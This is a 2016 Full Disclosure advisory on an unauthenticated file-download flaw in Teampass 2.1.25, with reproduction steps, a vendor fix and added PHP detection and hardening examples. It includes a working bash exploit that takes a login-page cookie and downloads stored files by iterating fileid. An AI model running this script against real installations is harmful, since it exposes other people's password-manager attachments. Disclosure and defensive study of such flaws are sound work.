List: full-disclosure
Subject: [FD] Teampass v2.1.25 - Arbitrary File Download Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-05-25 8:47:25
Message-ID: 0139532f-b49a-eb7c-7b9b-760abbf47069 () vulnerability-lab ! com
Document Title:
===============
Teampass v2.1.25 - Arbitrary File Download Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1843
Release Date:
=============
2016-05-17
Vulnerability Laboratory ID (VL-ID):
====================================
1843
Common Vulnerability Scoring System:
====================================
8.1
Product & Service Introduction:
===============================
TeamPass is a password manager dedicated to managing passwords in a collaborative way on any server running Apache, MySQL and PHP. It is especially designed to provide password access security for allowed people. This makes TeamPass really useful in a business/enterprise environment and provides IT or team managers with a powerful and easy tool for customizing password access depending on the user's role.
(Copy of the Homepage: http://teampass.net/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an arbitrary file download vulnerability in the Teampass Password Manager v2.1.25 web-application.
Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05-12: Vendor Notification (Teampass Security Team)
2016-05-13: Vendor Response/Feedback (Teampass Security Team)
2016-05-15: Vendor Fix/Patch (Teampass Developer Team)
2016-05-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file download web vulnerability has been discovered in the Teampass Password Manager v2.1.25 web-application. The vulnerability allows remote attackers to download stored files without authorization via a GET request.
The web vulnerability is located in the `downloadFile.php` file. Remote attackers are able to download internally uploaded files without any authentication: the only gate in front of the download is a session that any visitor obtains by loading the login page, and the file does not verify that the session belongs to an authenticated user (see the reproduction steps below). The vulnerability can be exploited by remote attackers without user interaction. The issue is located on the application side of the web-application and the request method used to access it is GET.
The security risk of the vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) score of 8.1. Exploitation of the arbitrary file download vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the arbitrary file download web vulnerability results in unauthorized file access and information disclosure.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] downloadFile.php
Vulnerable Parameter(s):
[+] fileid
Proof of Concept (PoC):
=======================
The arbitrary file download web vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Manual steps to reproduce the vulnerability ...
1. Open a browser and visit https://your.teampass.installation/sources/downloadFile.php, which will display the message "Hacking attempt..."
2. Get a cookie by visiting the login page https://your.teampass.installation/; you do not have to authenticate, only visit this page.
3. Again visit https://your.teampass.installation/sources/downloadFile.php; now that the cookie is set there is no "Hacking attempt..." message.
Files which are attached to items created in Teampass can now be downloaded with the URL https://your.teampass.installation/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=1
Just change the fileid in the URL to download different stored files.
PoC: Exploit
#!/bin/bash
COOKIE=/tmp/teampass.cookie
if [ ! "$1" ]
then
    echo "Usage: $0 [url]"
    exit 0
fi
# Get a valid cookie by loading the login page (no authentication needed)
curl -c "$COOKIE" -s "$1" >/dev/null
# Get stored files with fileid 1 through 100
for i in $(seq 1 100)
do
    curl -b "$COOKIE" -s -o "file-$i" "$1/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=$i"
    if [ -s "file-$i" ]
    then
        # Display the file type
        file "file-$i"
    else
        # Remove the file if empty
        rm -f "file-$i"
    fi
done
rm -f "$COOKIE"
exit 0
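As an added example (not part of this advisory and not TeamPass code), the following PHP CLI script shows how a defender can spot the pattern the PoC above leaves in web server access logs: one client requesting many distinct fileid values on downloadFile.php inside a short window, reported together with whether that client was ever seen logging in. The log lines are constructed, and the login endpoint in LOGIN_PATH is an assumption to be set to the installation's real login path.

```php
<?php
declare(strict_types=1);

const DOWNLOAD_PATH = '/sources/downloadFile.php';
const LOGIN_PATH    = '/login';  // assumption: replace with the installation's login endpoint
const THRESHOLD     = 5;         // distinct fileid values from one client inside the window
const WINDOW_SEC    = 60;

/** Parse one Apache/nginx "combined"-style log line into its fields, or null if unparseable. */
function parseLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $ts = DateTimeImmutable::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    $url   = parse_url($m[4]);
    $query = [];
    if (isset($url['query'])) {
        parse_str($url['query'], $query);
    }
    return [
        'ip'     => $m[1],
        'time'   => $ts->getTimestamp(),
        'method' => $m[3],
        'path'   => $url['path'] ?? '',
        'query'  => $query,
        'status' => (int) $m[5],
    ];
}

/**
 * Walk the lines in order and return alerts keyed by client IP:
 * ['distinct' => n, 'logged_in' => bool, 'ids' => [...]] for every client that
 * fetched THRESHOLD or more distinct fileid values within WINDOW_SEC seconds.
 */
function findEnumeration(array $lines): array
{
    $window   = [];  // ip => list of ['t' => timestamp, 'id' => fileid] inside the window
    $loggedIn = [];  // ip => true once a POST to the login path has been seen
    $alerts   = [];
    foreach ($lines as $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        if ($r['method'] === 'POST' && $r['path'] === LOGIN_PATH) {
            $loggedIn[$r['ip']] = true;
            continue;
        }
        // Only successful downloads with a fileid parameter are of interest.
        if ($r['path'] !== DOWNLOAD_PATH || $r['status'] !== 200 || !isset($r['query']['fileid'])) {
            continue;
        }
        $ip = $r['ip'];
        $window[$ip][] = ['t' => $r['time'], 'id' => (string) $r['query']['fileid']];
        // Drop events that fell out of the sliding window.
        $window[$ip] = array_values(array_filter(
            $window[$ip],
            fn(array $e): bool => $e['t'] >= $r['time'] - WINDOW_SEC
        ));
        $ids = array_values(array_unique(array_column($window[$ip], 'id')));
        if (count($ids) >= THRESHOLD) {
            $alerts[$ip] = ['distinct' => count($ids), 'logged_in' => isset($loggedIn[$ip]), 'ids' => $ids];
        }
    }
    return $alerts;
}

// Constructed sample: one client loads the login page and then walks fileid 1..6 without
// logging in; a second client logs in and fetches a single attachment.
$sample = [
    '203.0.113.5 - - [17/May/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:02 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=1 HTTP/1.1" 200 2048 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:03 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=2 HTTP/1.1" 200 4096 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:04 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=3 HTTP/1.1" 200 1024 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:05 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=4 HTTP/1.1" 200 512 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:06 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=5 HTTP/1.1" 200 777 "-" "curl/7.47.0"',
    '203.0.113.5 - - [17/May/2016:10:00:07 +0000] "GET /sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=6 HTTP/1.1" 200 9000 "-" "curl/7.47.0"',
    '198.51.100.9 - - [17/May/2016:10:05:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [17/May/2016:10:05:10 +0000] "GET /sources/downloadFile.php?name=report.pdf&pathIsFiles=0&fileid=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach (findEnumeration($sample) as $ip => $a) {
    printf("%s requested %d distinct fileid values (%s) within %ds; login seen: %s\n",
        $ip, $a['distinct'], implode(',', $a['ids']), WINDOW_SEC, $a['logged_in'] ? 'yes' : 'no');
}
```

Run it with `php detect.php` after pointing `$sample` at real log lines (or reading them with `file()`); a client that trips the threshold with no login seen is the strongest signal, while a logged-in client tripping it still deserves a look because the vulnerable file skips authorization as well as authentication.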
Solution - Fix & Patch:
=======================
The arbitrary file download vulnerability can be patched by denying access to `downloadFile.php` unless the request comes from an authenticated session.
Note: The manufacturer fixed the vulnerability and an update is available for download in version 2.1.26.
URL: http://teampass.net/2016-05-13-release-2.1.26
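The fix described above, as an added PHP example that is not TeamPass's own code: the weak pattern that lets any visitor who has loaded the login page through, beside a hardened gate that requires an authenticated user in the session, validates fileid strictly, and only serves a file after a server-side authorization lookup. The session keys (`app_marker`, `user_id`), the lookup callback, the sample ACL and PHP 8 syntax are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// --- Weak pattern (the class of check the advisory describes) --------------
// The only gate is a marker the application stores in the session when any
// page, the login page included, is loaded. A visitor who never logged in
// therefore passes. Key name is an assumption.
function canDownloadWeak(array $session): bool
{
    return isset($session['app_marker']) && $session['app_marker'] === 1;
}

// --- Hardened pattern ------------------------------------------------------
// 1. Require an authenticated principal in the session, not merely a session.
// 2. Validate fileid as a positive integer before it reaches any query.
// 3. Resolve the file server-side and check that this user may read the item
//    it belongs to; never trust a client-supplied name or path.
final class DownloadGate
{
    /** @param \Closure $lookup fn(int $userId, int $fileid): ?array  (assumed DB join) */
    public function __construct(private \Closure $lookup) {}

    /** Returns the server-side file record if the download is allowed, else null. */
    public function resolve(array $session, mixed $fileidRaw): ?array
    {
        if (!isset($session['user_id']) || !is_int($session['user_id'])) {
            return null;  // anonymous session: no user_id was ever set
        }
        if (!is_string($fileidRaw) && !is_int($fileidRaw)) {
            return null;
        }
        $fileid = filter_var($fileidRaw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($fileid === false) {
            return null;  // rejects "../etc", "1 OR 1", negative ids, etc.
        }
        return ($this->lookup)($session['user_id'], $fileid);
    }
}

/** Send an authorized file; the download name comes from the record, not the request. */
function sendFile(array $file): void
{
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', $file['name']);
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($file['path']);
}

// --- Demonstration with constructed sessions and ACL -----------------------
$anonymous = ['app_marker' => 1];                  // only visited the login page
$user      = ['app_marker' => 1, 'user_id' => 7];  // actually logged in

// Stand-in for the DB join from file -> item -> access rights: user 7 may read file 1 only.
$lookup = function (int $userId, int $fileid): ?array {
    $acl = [7 => [1 => ['path' => '/var/files/1.bin', 'name' => 'report.pdf']]];
    return $acl[$userId][$fileid] ?? null;
};
$gate = new DownloadGate($lookup);

$cases = [
    ['weak gate, anonymous',          canDownloadWeak($anonymous)],
    ['hardened, anonymous, id 1',     $gate->resolve($anonymous, '1') !== null],
    ['hardened, user 7, id 1',        $gate->resolve($user, '1') !== null],
    ['hardened, user 7, id 2',        $gate->resolve($user, '2') !== null],
    ['hardened, user 7, id ../etc',   $gate->resolve($user, '../etc') !== null],
];
foreach ($cases as [$label, $allowed]) {
    printf("%-32s %s\n", $label, $allowed ? 'allowed' : 'denied');
}
```

In a real handler the `$lookup` closure is the place where the file is joined to its item and to the caller's rights, so that an authenticated user cannot walk other users' attachments by incrementing fileid either; fixing authentication alone closes the advisory's finding but leaves that second gap open.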
Security Risk:
==============
The security risk of the arbitrary file download web vulnerability in the Teampass Password Manager web-application is estimated as high. (CVSS 8.1)
Credits & Authors:
==================
Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/